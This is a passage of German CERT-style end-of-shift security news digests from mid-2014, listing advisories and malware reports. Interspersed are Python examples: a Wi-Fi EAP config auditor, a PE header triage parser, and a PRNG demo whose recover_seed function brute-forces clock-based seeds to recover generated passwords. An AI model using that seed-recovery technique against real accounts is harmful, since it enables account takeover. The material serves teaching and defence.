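                        "trusted CA is accepted")
    if net.get("eap") in ("PEAP", "TTLS") and "anonymous_identity" not in net:
        findings.append("no anonymous_identity: the real username travels "
                        "unencrypted in the outer EAP identity")
    return findings


def audit(conf: str) -> Dict[str, List[str]]:
    """Map each SSID to its list of findings (empty list means clean)."""
    return {net.get("ssid", "?"): audit_network(net) for net in parse_networks(conf)}


if __name__ == "__main__":
    for ssid, findings in audit(SAMPLE_CONF).items():
        print(ssid, "OK" if not findings else "")
        for finding in findings:
            print("   -", finding)
```

The first block is the default the advisory describes and produces three findings; the second shows the minimum a hardened profile carries (CA pinning, a server-name match, and an anonymous outer identity). domain_suffix_match is the wpa_supplicant option for the server-name check; the older subject_match and altsubject_match are accepted as equivalents.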
*** How not to tell your customers how much you care about their security ***
---------------------------------------------
We've written before about "what not to do" when sending emails to your customers. Here's another example, with an explanation of why doing the right thing will be better for everyone - including your marketing team! - in the long run.
---------------------------------------------
http://nakedsecurity.sophos.com/2014/07/08/how-not-to-tell-your-customers-h…
*** Metadata against antivirus false positives ***
---------------------------------------------
The IEEE has launched a database of metadata for binaries. It provides information with which a virus scanner can determine unambiguously whether a file is benign.
---------------------------------------------
http://www.heise.de/security/meldung/Metadaten-gegen-Viren-Fehlerkennugen-2…
*** GKsu and VirtualBox Root Command Execution by Filename (CVE-2014-2943) ***
---------------------------------------------
https://community.rapid7.com/community/metasploit/blog/2014/07/07/virtualbo…
*** Bugtraq: Backdoor access to Techboard/Syac devices ***
---------------------------------------------
http://www.securityfocus.com/archive/1/532665
*** [remote] - Oracle Event Processing FileUploadServlet Arbitrary File Upload ***
---------------------------------------------
http://www.exploit-db.com/exploits/33989
*** Vuln: GitList CVE-2014-4511 Unspecified Remote Code Execution Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/bid/68253
*** Security Advisory-Apache Struts2 vulnerability on Huawei multiple products ***
---------------------------------------------
Jul 07, 2014 21:09
---------------------------------------------
http://www.huawei.com/en/security/psirt/security-bulletins/security-advisor…
*** Apple iTunes 11.2.2 Insecure Libraries ***
---------------------------------------------
Topic: Apple iTunes 11.2.2 Insecure Libraries. Risk: High. Text: Hi @ll, Apple's current iTunes 11.2.2 for Windows comes with the following COMPLETELY outdated and vulnerable 3rd party libr...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014070042
*** Apache Syncope Insecure Password Generation ***
---------------------------------------------
Topic: Apache Syncope Insecure Password Generation. Risk: Medium. Text: CVE-2014-3503: Insecure Random implementations used to generate passwords in Apache Syncope. Severity: Major. Vendor: The ...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014070039
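The point of the advisory is generic: a password drawn from a general-purpose PRNG is a deterministic function of the seed, and when the seed is small or guessable (typically a clock value) anyone who can replay the generator recovers the password. The Python below is an added illustration of that bug class, not Apache Syncope's Java code: the clock-seeded generator and the account-creation timestamp are constructed assumptions, and the corrected version draws from the OS CSPRNG through the secrets module.

```python
"""Why a clock-seeded PRNG is the wrong way to generate passwords.

Added illustration of the bug class in the advisory, not Apache Syncope's
Java code. The clock-seeded generator and the account-creation timestamp
are constructed assumptions; the fix uses the OS CSPRNG via secrets.
"""
import random
import secrets
import string
from typing import Optional

ALPHABET = string.ascii_letters + string.digits
LENGTH = 12


def weak_password(seed: int, length: int = LENGTH) -> str:
    """Anti-pattern: a general-purpose PRNG seeded with a predictable value.

    random.Random (Mersenne Twister) is a deterministic function of its
    seed, as is java.util.Random; whoever knows or can guess the seed gets
    the same password.
    """
    rng = random.Random(seed)
    return "".join(rng.choice(ALPHABET) for _ in range(length))


def strong_password(length: int = LENGTH) -> str:
    """Fix: draw from the OS CSPRNG. There is no seed to recover."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def recover_seed(observed: str, approx_time: int, window: int = 3600) -> Optional[int]:
    """Attacker's side: one observed password plus a rough idea of when it
    was generated (creation timestamp +/- window seconds) is enough to
    replay the generator for every candidate seed until the output matches.
    """
    for seed in range(approx_time - window, approx_time + window + 1):
        if weak_password(seed, len(observed)) == observed:
            return seed
    return None


# Constructed scenario: the application seeded the generator with the Unix
# time of account creation; the attacker knows it to within 20 minutes.
CREATION_TIME = 1404806400  # 2014-07-08 08:00:00 UTC


if __name__ == "__main__":
    pw = weak_password(CREATION_TIME)
    found = recover_seed(pw, CREATION_TIME + 1200)
    print(f"weak password {pw}: seed recovered -> {found}")
    print(f"strong password {strong_password()}: nothing to replay")
```

Recovering the seed also yields every other password the same generator produced from it, which is why the fix is to change the source of randomness rather than to lengthen the password.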
*** Vuln: WordPress Easy Banners Plugin easy-banners.php Cross Site Scripting Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/bid/68281
*** Vuln: WordPress Custom Banners Plugin options.php Cross Site Scripting Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/bid/68279
*** TYPO3 CMS 4.5.35, 6.1.10 and 6.2.4 released ***
---------------------------------------------
The TYPO3 Community announces the versions 4.5.35, 6.1.10 and 6.2.4 of the TYPO3 Enterprise Content Management System. All versions are maintenance releases and contain bug fixes.
---------------------------------------------
https://typo3.org/news/article/typo3-cms-4535-6110-and-624-released/
*** HPSBGN03050 rev.1 - HP IceWall SSO Dfw and HP IceWall MCRP running OpenSSL, Remote Denial of Service (DoS), Code Execution, Security Restriction Bypass, Disclosure of Information, or Unauthorized Access ***
---------------------------------------------
Potential security vulnerabilities have been identified with HP IceWall SSO Dfw and HP IceWall MCRP running OpenSSL. The vulnerabilities could be exploited remotely to create a Denial of Service (DoS), execute code, allow unauthorized access, or disclose information.
---------------------------------------------
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 04-07-2014 18:00 − Monday 07-07-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Self-signing custom Android ROMs ***
---------------------------------------------
The security model on the Google Nexus devices is pretty straightforward. The OS is (nominally) secure and prevents anything from accessing the raw MTD devices. The bootloader will only allow the user to write to partitions if it's unlocked. The recovery image will only permit you to install images that are signed with a trusted key. In combination, these facts mean that it's impossible for an attacker to modify the OS image without unlocking the bootloader[1], and unlocking the bootloader wipes
---------------------------------------------
http://mjg59.dreamwidth.org/31765.html
*** Java Support ends for Windows XP, (Sat, Jul 5th) ***
---------------------------------------------
Oracle is no longer supporting Java for Windows XP and will only support Windows Vista or later. Java 8 is not supported on Windows XP and users will be unable to install it on their systems. Oracle warns: "Users may still continue to use Java 7 updates on Windows XP at their own risk" [1]
[1] https://www.java.com/en/download/faq/winxp.xml
[2] http://www.oracle.com/us/support/library/057419.pdf
https://www.java.com/en/…
----------- Guy Bruneau IPSS Inc. gbruneau at
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=18345&rss
*** Critical Vulnerability and Privacy LoopHole Found in RoboForm Password Manager ***
---------------------------------------------
Unless you are a human supercomputer, remembering passwords is not easy, especially if you have a different password for each site. But luckily, to make the whole process very easy, there is a growing market out there for password managers and lockers with extra layers of security. But, if you are using the mobile version of the most popular password manager from password management company
---------------------------------------------
http://feedproxy.google.com/~r/TheHackersNews/~3/Ajpf8i6yTao/critical-vulne…
*** Two patches close SQL injection holes in Ruby on Rails ***
---------------------------------------------
Two fairly similar holes allowed SQL injection on websites built on Ruby on Rails 2.0.0 to 3.1.18 as well as 4.x. After several attempts, the Rails developers have now closed the holes.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Zwei-Patches-schliessen-SQL-Injectio…
*** Malware Analysis with pedump, (Sat, Jul 5th) ***
---------------------------------------------
Are you looking for a tool to analyze Windows Portable Executable (PE) files? Consider using pedump, a Ruby win32 PE binary file analyzer. It currently supports DOS MZ EXE, win16 NE and win32/64 PE. There are several ways to install the Ruby package; however, the simplest way is to execute "gem install pedump" from a Linux workstation. You can also download the file here or use the pedump website to upload your file for analysis. This example shows the output from the pedump website.
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=18347&rss
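For readers who want to see what a PE dumper actually reads before reaching for pedump, the Python below is an added example (not pedump's code and not from the diary). It builds a constructed, minimal PE32 image in memory, parses the DOS header, PE signature, COFF header, optional-header magic and section table with struct, and applies the section-table heuristics an analyst checks first: writable+executable sections, sections with no data on disk but a large virtual size, packer section names, and a zeroed build timestamp. The sample image consists of headers only and is not executable.

```python
"""Minimal PE header/section-table parser with triage heuristics.

Added example, not pedump's code and not from the ISC diary. Builds a
constructed, minimal (non-executable) PE32 image in memory, parses the DOS
header, PE signature, COFF header, optional-header magic and section table
with struct, and applies the section-table checks an analyst looks at first.
"""
import struct
from typing import Any, Dict, List

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# COFF file header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
# NumberOfSymbols, SizeOfOptionalHeader, Characteristics
COFF_FMT = "<HHIIIHH"
# Section header: Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
# PointerToRelocations, PointerToLinenumbers, NumberOfRelocations,
# NumberOfLinenumbers, Characteristics
SECTION_FMT = "<8sIIIIIIHHI"


def build_sample_pe() -> bytes:
    """Constructed image: DOS stub, PE signature, COFF header, a padded
    PE32 optional header and two sections. Headers only; nothing runs."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt = struct.pack("<H", 0x10B) + b"\x00" * 94           # Magic = PE32, rest zero
    coff = struct.pack(COFF_FMT, 0x14C, 2, 0, 0, 0, len(opt), 0x0102)
    sections = [
        (b".text", 0x1000, 0x1000, 0x200, 0x400,
         IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE),
        (b"UPX1", 0x8000, 0x2000, 0x0, 0x0,
         IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE),
    ]
    table = b"".join(
        struct.pack(SECTION_FMT, name, vsize, vaddr, rawsize, rawptr, 0, 0, 0, 0, flags)
        for name, vsize, vaddr, rawsize, rawptr, flags in sections
    )
    return dos + b"PE\x00\x00" + coff + opt + table


def parse_pe(data: bytes) -> Dict[str, Any]:
    """Walk the headers the way a PE dumper does; raise on malformed input."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("no PE signature at e_lfanew")
    coff_off = e_lfanew + 4
    machine, nsect, stamp, _, _, opt_size, chars = struct.unpack_from(COFF_FMT, data, coff_off)
    opt_off = coff_off + struct.calcsize(COFF_FMT)
    (magic,) = struct.unpack_from("<H", data, opt_off)
    fmt = {0x10B: "PE32", 0x20B: "PE32+"}.get(magic, f"unknown(0x{magic:x})")
    sec_off = opt_off + opt_size
    sections: List[Dict[str, Any]] = []
    for i in range(nsect):
        name, vsize, vaddr, rawsize, rawptr, _, _, _, _, flags = struct.unpack_from(
            SECTION_FMT, data, sec_off + i * struct.calcsize(SECTION_FMT))
        sections.append({
            "name": name.rstrip(b"\x00").decode("ascii", "replace"),
            "vsize": vsize, "vaddr": vaddr, "rawsize": rawsize,
            "rawptr": rawptr, "flags": flags,
        })
    return {"machine": machine, "format": fmt, "timestamp": stamp,
            "characteristics": chars, "sections": sections}


def triage(info: Dict[str, Any]) -> List[str]:
    """Section-table heuristics: RWX sections, packer-style empty-on-disk
    sections, well-known packer names, and a zeroed build timestamp."""
    notes: List[str] = []
    for s in info["sections"]:
        f = s["flags"]
        if f & IMAGE_SCN_MEM_WRITE and f & IMAGE_SCN_MEM_EXECUTE:
            notes.append(f"{s['name']}: writable+executable (self-modifying code or unpacking stub)")
        if s["rawsize"] == 0 and s["vsize"] > 0:
            notes.append(f"{s['name']}: no data on disk but {s['vsize']:#x} bytes in memory "
                         "(filled at runtime, typical of packers)")
        if s["name"].upper().startswith("UPX"):
            notes.append(f"{s['name']}: UPX section name")
    if info["timestamp"] == 0:
        notes.append("TimeDateStamp is zero (build timestamp stripped)")
    return notes


if __name__ == "__main__":
    info = parse_pe(build_sample_pe())
    print(info["format"], f"machine=0x{info['machine']:x}", f"sections={len(info['sections'])}")
    for note in triage(info):
        print(" -", note)
```

To run it against a real file, replace build_sample_pe() with open(path, "rb").read(); the parser only touches the header region, so it works on partial or truncated samples as long as the section table is present.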
*** Industrial Control System Firms In Dragonfly Attack Identified ***
---------------------------------------------
chicksdaddy (814965) writes Two of the three industrial control system (ICS) software companies that were victims of the so-called "Dragonfly" malware have been identified. ... Dale Peterson of the firm Digitalbond identified the vendors as MB Connect Line, a German maker of industrial routers and remote access appliances and eWon, a Belgian firm that makes virtual private network (VPN) software that is used to access industrial control devices like programmable logic controllers.
---------------------------------------------
http://rss.slashdot.org/~r/Slashdot/slashdot/~3/Jr0QiFtg7lc/story01.htm
*** Coinbase wallet app in SSL/TLS SNAFU ***
---------------------------------------------
The popular Bitcoin wallet Coinbase has a security flaw in its Android apps which could allow an attacker to steal authentication codes and access users' accounts, according to a security researcher. Coinbase is far from alone in leaving its wallet app users vulnerable, so what should you do to stay safe when using mobile banking apps?
---------------------------------------------
http://feedproxy.google.com/~r/nakedsecurity/~3/GsgGIYu7TA0/
*** The Rise of Thin, Mini and Insert Skimmers ***
---------------------------------------------
Like most electronic gadgets these days, ATM skimmers are getting smaller and thinner, with extended battery life. Here's a look at several miniaturized fraud devices that were pulled from compromised cash machines at various ATMs in Europe so far this year.
---------------------------------------------
http://feedproxy.google.com/~r/KrebsOnSecurity/~3/8s5hQ323oMY/
*** Fridge hacked. Car hacked. Next up, your LIGHT BULBS ***
---------------------------------------------
So shall you languish in darkness - or under disco-style strobes - FOREVER. Those convinced that the emerging Internet of Things (IoT) will become a hackers' playground were given more grist for their mill with news on Friday that security researchers have discovered a weakness in Wi-Fi/mesh networked lightbulbs.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2014/07/07/wifi_enable…
*** Lawyers: fake file-sharing cease-and-desist letters spread malware en masse ***
---------------------------------------------
Two well-known lawyers warn of fake cease-and-desist letters over illegal music downloads. The mass-mailed e-mails carry a zip file containing malicious code.
---------------------------------------------
http://www.golem.de/news/anwaelte-falsche-filesharing-abmahnung-verbreitet-…
*** IBM Security Bulletin: Multiple vulnerabilities exist in IMS Enterprise Suite SOAP Gateway (CVE-2014-0453, CVE-2013-4286, CVE-2013-4322) ***
---------------------------------------------
The IMS Enterprise Suite SOAP Gateway is affected by multiple vulnerabilities in IBM SDK, Java Technology Edition (April Update) and Apache Tomcat. CVE(s): CVE-2014-0453, CVE-2013-4286 and CVE-2013-4322. Affected product(s) and affected version(s): CVE-2014-0453: the SOAP Gateway component of the IMS Enterprise Suite versions 2.1, 2.2, 3.1. CVE-2013-4286 and CVE-2013-4322: the SOAP Gateway component of the IMS Enterprise Suite versions 2.2, 3.1.
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin…
*** OpenSSL vulnerabilities in IBM Products ***
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin…
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin…
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin…
*** RealPlayer MP4 Memory Corruption Flaw Lets Remote Users Execute Arbitrary Code ***
---------------------------------------------
http://www.securitytracker.com/id/1030524
*** [webapps] - Netgear WNR1000v3 - Password Recovery Credential Disclosure Vulnerability ***
---------------------------------------------
http://www.exploit-db.com/exploits/33984
*** VU#960193: AVG Secure Search ActiveX control provides insecure methods ***
---------------------------------------------
Vulnerability Note VU#960193
AVG Secure Search ActiveX control provides insecure methods
Original Release date: 07 Jul 2014 | Last revised: 07 Jul 2014
Overview: The AVG Secure Search toolbar includes an ActiveX control that provides a number of unsafe methods, which may allow a remote, unauthenticated attacker to execute arbitrary code with the privileges of the user.
Description: AVG Secure Search is a toolbar add-on for web browsers that "... provides an additional security layer while
---------------------------------------------
http://www.kb.cert.org/vuls/id/960193
*** Bugtraq: CVE-2014-3863 - Stored XSS in JChatSocial ***
---------------------------------------------
http://www.securityfocus.com/archive/1/532662
*** WordPress Theme My Login for WordPress file include ***
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/94160
=======================
= End-of-Shift report =
=======================
Timeframe: Donnerstag 03-07-2014 18:00 − Freitag 04-07-2014 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** Cisco Intelligent Automation for Cloud Form Data Viewer information disclosure ***
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/94177
*** VU#143740: Netgear GS108PE Prosafe Plus Switch contains hard-coded login credentials ***
---------------------------------------------
Netgear GS108PE Prosafe Plus Switch contains hard-coded login credentials that can be used for authenticating to the web server running on the device. The username is ..
---------------------------------------------
http://www.kb.cert.org/vuls/id/143740
*** MS14-JUL - Microsoft Security Bulletin Advance Notification for July 2014 - Version: 1.0 ***
---------------------------------------------
https://technet.microsoft.com/en-us/library/security/MS14-JUL
*** Phishing: iPhone 6 and iWatch as bait ***
---------------------------------------------
Attackers are currently exploiting the attention surrounding upcoming Apple products to lure users to a fake Apple website. The layout of the e-mail resembles official Apple notices.
---------------------------------------------
http://www.heise.de/security/meldung/Phishing-iPhone-6-und-iWatch-als-Lockm…
*** Security Bulletin: IBM BladeCenter Advanced Management Module (AMM), Integrated Management Module (IMM), and Integrated Management Module 2 (IMM2) Potential IPMI credentials Exposure (CVE-2014-0860) ***
---------------------------------------------
The administrative IPMI credentials for authenticating communications between the IBM BladeCenter Advanced Management Module (AMM), Integrated Management Module (IMM), and Integrated Management Module 2 (IMM2) are stored in plaintext within the AMM firmware binaries.
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_ibm…
*** Dailymotion Compromised to Send Users to Exploit Kit ***
---------------------------------------------
Attackers made the popular video site redirect users to the Sweet Orange Exploit Kit. On June 28, the popular video sharing website Dailymotion was compromised to redirect users to the Sweet Orange Exploit Kit. This exploit kit takes advantage of vulnerabilities in Java, Internet Explorer, and Flash Player. If the ..
---------------------------------------------
http://www.symantec.com/connect/blogs/dailymotion-compromised-send-users-ex…
*** HP Universal Configuration Management Database Flaws Let Remote Users Obtain Information and Execute Arbitrary Code ***
---------------------------------------------
http://www.securitytracker.com/id/1030518
*** "Phishing is turning from a rare occurrence into everyday business" ***
---------------------------------------------
While more and more phishing websites are appearing, the tactics used are becoming ever more sophisticated. Victims are increasingly addressed personally.
---------------------------------------------
http://futurezone.at/digital-life/phishing-wird-vom-seltenen-anlass-zum-tag…
*** Miniduke is back: Nemesis Gemina and the Botgen Studio ***
---------------------------------------------
In the wake of our publications from 2013, the Miniduke campaigns have stopped or at least decreased in intensity. However, in the beginning of 2014 they resumed attacks in full force, once again grabbing our attention. We believe it's time to uncover more information on their operations.
---------------------------------------------
https://www.securelist.com/en/blog/208214341/Miniduke_is_back_Nemesis_Gemin…
*** phpinfo() Type Confusion Infoleak Vulnerability and SSL Private Keys ***
---------------------------------------------
In this post we will detail the phpinfo() type confusion vulnerability that we disclosed to PHP.net and show how it allows a PHP script to steal the private SSL key. We demonstrate this on an Ubuntu 12.04 LTS 32 bit default installation of PHP and mod_ssl. Unfortunately this kind of problem is not considered a security problem by PHP.net and therefore this security vulnerability does not have a CVE name assigned to it, yet.
---------------------------------------------
https://www.sektioneins.de/en/blog/14-07-04-phpinfo-infoleak.html
=======================
= End-of-Shift report =
=======================
Timeframe: Mittwoch 02-07-2014 18:00 − Donnerstag 03-07-2014 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** Multiple Vulnerabilities in Cisco Unified Communications Domain Manager ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Analysis of a New Banking Trojan Spammed by Cutwail ***
---------------------------------------------
The Cutwail spambot has a long history of sending spam with attached malicious files such as Zbot, Blackhole Exploit Kit and Cryptolocker. Another trick in Cutwail's portfolio is to use links pointing to popular file hosting services. Over the past weeks, we have observed spam that claims to be an unpaid invoice from ..
---------------------------------------------
http://blog.spiderlabs.com/2014/07/analysis-of-a-banking-trojan-spammed-by-…
*** Simple Javascript Extortion Scheme Advertised via Bing, (Wed, Jul 2nd) ***
---------------------------------------------
Thanks to our reader Dan for spotting this one. As of today, a search for "Katie Matusik" on Bing will include the following result. The rank has been slowly rising during the day, and as of right now, it is the first link after the link to "Videos". Once a user clicks on the link, the user is redirected to ..
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=18337&rss
*** Multiple vulnerabilities in third-party Drupal modules ***
---------------------------------------------
https://www.drupal.org/node/2296783
https://www.drupal.org/node/2296511
https://www.drupal.org/node/2296495
*** New Android Malware HijackRAT Attacks Mobile Banking Users ***
---------------------------------------------
Cybercriminals have rolled out a new malicious Android application that wraps different varieties of banking fraud tricks into a single piece of advanced mobile malware.
---------------------------------------------
http://thehackernews.com/2014/07/new-android-malware-hijackrat-attacks.html
*** Exploring the Java vulnerability (CVE-2013-2465) used in the Fiesta EK ***
---------------------------------------------
While going through our daily analysis this month, we came across several Fiesta Exploit Kit attacks. Although this EK first emerged in August 2013, the authors have constantly updated their ..
---------------------------------------------
http://research.zscaler.com/2014/07/exploring-java-vulnerability-cve-2013.h…
*** Avast mistook crypto messenger for a trojan ***
---------------------------------------------
Anyone supposedly infected with the trojan "Android:Banker-BW" can, under certain circumstances, safely ignore the warning. The Avast virus scanner wrongly classified Moxie Marlinspike's crypto messenger TextSecure as malware.
---------------------------------------------
http://www.heise.de/security/meldung/Avast-hielt-Krypto-Messenger-fuer-Troj…
*** Bugtraq: [security bulletin] HPSBMU03059 rev.1 - HP SiteScope, Remote Authentication Bypass ***
---------------------------------------------
http://www.securityfocus.com/archive/1/532631
*** DynDNS service: Microsoft has returned domains to NoIP ***
---------------------------------------------
For days the DynDNS service NoIP has not been working for many customers because the domains had been transferred to Microsoft and many requests went nowhere. Microsoft has now returned the domains and the situation should normalise.
---------------------------------------------
http://www.heise.de/security/meldung/DynDNS-Dienst-Microsoft-hat-Domains-an…
*** VU#402020: Autodesk VRED contains an unauthenticated remote code execution vulnerability ***
---------------------------------------------
Improper Neutralization of Special Elements used in an OS Command (OS Command Injection): Autodesk VRED Professional 2014 contains an unauthenticated remote code execution vulnerability. Autodesk VRED Professional 2014.
---------------------------------------------
http://www.kb.cert.org/vuls/id/402020
*** 8 Common Pitfalls of HeartBleed Identification and Remediation (CVE-2014-0160) ***
---------------------------------------------
Unfortunately, one of the biggest vulnerabilities disclosed this year, HeartBleed, has been inefficiently addressed and for some, already forgotten about. Plenty of details about the vulnerability already exist including our FAQ and ..
---------------------------------------------
http://blog.spiderlabs.com/2014/07/pitfalls-of-heartbleed-identification-an…
=======================
= End-of-Shift report =
=======================
Timeframe: Dienstag 01-07-2014 18:00 − Mittwoch 02-07-2014 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** Microsoft Expands TLS, Forward Secrecy Support ***
---------------------------------------------
Microsoft announced TLS support on Outlook.com and that OneDrive cloud storage now supports Perfect Forward Secrecy.
---------------------------------------------
http://threatpost.com/microsoft-expands-tls-forward-secrecy-support/106965
*** Cisco Small Cell Command Execution Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** DOWNAD Tops Malware Spam Source in Q2 2014 ***
---------------------------------------------
DOWNAD, also known as Conficker, remains one of the top 3 malware families affecting enterprises and small and medium businesses. This is attributed to the fact that a number of companies are still using Windows XP, which is susceptible to this threat. It can infect ..
---------------------------------------------
http://blog.trendmicro.com/trendlabs-security-intelligence/downad-tops-malw…
*** VMSA-2014-0006.4 ***
---------------------------------------------
VMware product updates address OpenSSL security vulnerabilities
---------------------------------------------
http://www.vmware.com/security/advisories/VMSA-2014-0006.html
*** Microsoft Digital Crimes Unit disrupts Jenxcus and Bladabindi malware families ***
---------------------------------------------
Today, following an investigation to which the Microsoft Malware Protection Center (MMPC) contributed, the Microsoft Digital Crimes Unit initiated a disruption of the Jenxcus and Bladabindi malware families. These families are believed to have been created by individuals Naser Al Mutairi, aka njQ8, and ..
---------------------------------------------
http://blogs.technet.com/b/mmpc/archive/2014/06/30/microsoft-digital-crimes…
*** MONSTER COOKIES can nom nom nom ALL THE BLOGS ***
---------------------------------------------
Blog networks can be force-fed more than they can chew. Giant cookies could be used to create a denial of service (DoS) on blog networks, says infosec researcher Bogdan Calin.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2014/07/02/monster_coo…
*** Transparency centre: Microsoft grants government agencies access to source code ***
---------------------------------------------
In a transparency centre, Microsoft wants to give government agencies that fear code manipulation by foreign intelligence services the opportunity to examine the source code themselves.
---------------------------------------------
http://www.heise.de/security/meldung/Transparenzzentrum-Microsoft-gewaehrt-…
*** Anatomy of a buffer overflow - Google's "KeyStore" security module for Android ***
---------------------------------------------
Here's a cautionary tale about a bug, courtesy of IBM. Not that IBM had the bug, just to be clear: Google had the bug, and IBM researchers spotted it.
---------------------------------------------
http://nakedsecurity.sophos.com/2014/07/02/anatomy-of-a-buffer-overflow-goo…
*** OpenSSL presents remediation plan ***
---------------------------------------------
After the Heartbleed disaster, the OpenSSL project has now published a roadmap intended to help fix organisational shortcomings in its development process.
---------------------------------------------
http://www.heise.de/security/meldung/OpenSSL-legt-Sanierungsplan-vor-224810…
*** Rig Exploit Kit Used in Recent Website Compromise ***
---------------------------------------------
Attackers planted code in a popular Web portal to redirect users to an exploit kit ..
---------------------------------------------
http://www.symantec.com/connect/blogs/rig-exploit-kit-used-recent-website-c…
=======================
= End-of-Shift report =
=======================
Timeframe: Montag 30-06-2014 18:00 − Dienstag 01-07-2014 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** Microsoft Darkens 4MM Sites in Malware Fight ***
---------------------------------------------
Millions of Web sites were shuttered Monday morning after Microsoft executed a legal sneak attack against a malware network thought to be responsible for more than 7.4 million infections of Windows PCs worldwide.
---------------------------------------------
http://krebsonsecurity.com/2014/07/microsoft-darkens-4mm-sites-in-malware-f…
*** Apple Releases Security Updates for OS X, Safari, iOS devices, and Apple TV ***
---------------------------------------------
Apple has released security updates for Mac OS X, Safari, iOS devices, and Apple TV to address multiple vulnerabilities, some of which could allow attackers to execute arbitrary code with system privileges or cause an unexpected application termination.
---------------------------------------------
https://www.us-cert.gov/ncas/current-activity/2014/07/01/Apple-Releases-Sec…
*** [2014-06-30] Multiple vulnerabilities in IBM Algorithmics RICOS ***
---------------------------------------------
Abusing multiple vulnerabilities within IBM Algorithmics RICOS, an attacker can take over foreign user accounts and bypass authorization mechanisms.
---------------------------------------------
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014…
*** JBoss Seam org.jboss.seam.web.AuthenticationFilter code execution ***
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/94090
*** ICS Focused Malware ***
---------------------------------------------
http://ics-cert.us-cert.gov//advisories/ICSA-14-178-01
*** CERT-Bund: Trojan victims change passwords, PCs remain infected ***
---------------------------------------------
The analysis of tens of thousands of compromised e-mail credentials shows that a considerable share of the victims do change their password, but quickly fall victim again - possibly because the computer was never disinfected.
---------------------------------------------
http://www.heise.de/security/meldung/CERT-Bund-Trojaner-Opfer-aendern-Passw…
*** [2014-07-01] Stored cross site scripting in EMC Documentum eRoom ***
---------------------------------------------
Due to improper input validation, EMC Documentum eRoom suffers from multiple stored cross-site scripting vulnerabilities, which allow an attacker to steal other users' sessions, to impersonate other users and to gain unauthorized access to documents hosted in eRooms.
---------------------------------------------
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014…
*** Apple tests two-factor authentication on iCloud.com ***
---------------------------------------------
In future, credentials are to be better protected on Apple's cloud portal as well. Yesterday the feature was briefly enabled.
---------------------------------------------
http://www.heise.de/security/meldung/Apple-testet-Zwei-Faktor-Authentifizie…
*** Confusion over Microsoft's security newsletter ***
---------------------------------------------
Anyone who administers Windows machines appreciates Microsoft's Security Notifications newsletter. Last week the company announced it would discontinue it - only to reverse the decision shortly afterwards.
---------------------------------------------
http://www.heise.de/security/meldung/Verwirrung-um-Microsofts-Sicherheits-N…
*** Cyberspying Campaign Comes With Sabotage Option ***
---------------------------------------------
New research from Symantec spots US and Western European energy interests in the bull's-eye, but the campaign could encompass more than just utilities.
---------------------------------------------
http://www.darkreading.com/vulnerabilities---threats/advanced-threats/cyber…
*** Geodo: New Cridex Version Combines Data Stealer and Email Worm ***
---------------------------------------------
Recent efforts by our Research Lab have revealed new activity related to Cridex. As you may recall, Cridex is a data stealer also referred to as Feodo and Bugat. The new Cridex version we are seeing now, aka Geodo, combines a self-spreading infection method - effectively turning each bot in the botnet ..
---------------------------------------------
http://www.seculert.com/blog/2014/07/geodo-new-cridex-version-combines-data…
*** Remote File Upload Vulnerability in WordPress MailPoet Plugin (wysija-newsletters) ***
---------------------------------------------
Marc-Alexandre Montpas, from our research team, found a serious security vulnerability in the MailPoet WordPress plugin. This bug allows an attacker to upload any file remotely to the vulnerable website (i.e., no authentication is required). This is a serious vulnerability. The MailPoet plugin (wysija-newsletters) ..
---------------------------------------------
http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet…
*** IBM BladeCenter Advanced Management Module (AMM), Integrated Management Module (IMM), and Integrated Management Module 2 (IMM2) Potential IPMI credentials Exposure ***
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/90880
=======================
= End-of-Shift report =
=======================
Timeframe: Freitag 27-06-2014 18:00 − Montag 30-06-2014 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** The Akamai State of the Internet Report ***
---------------------------------------------
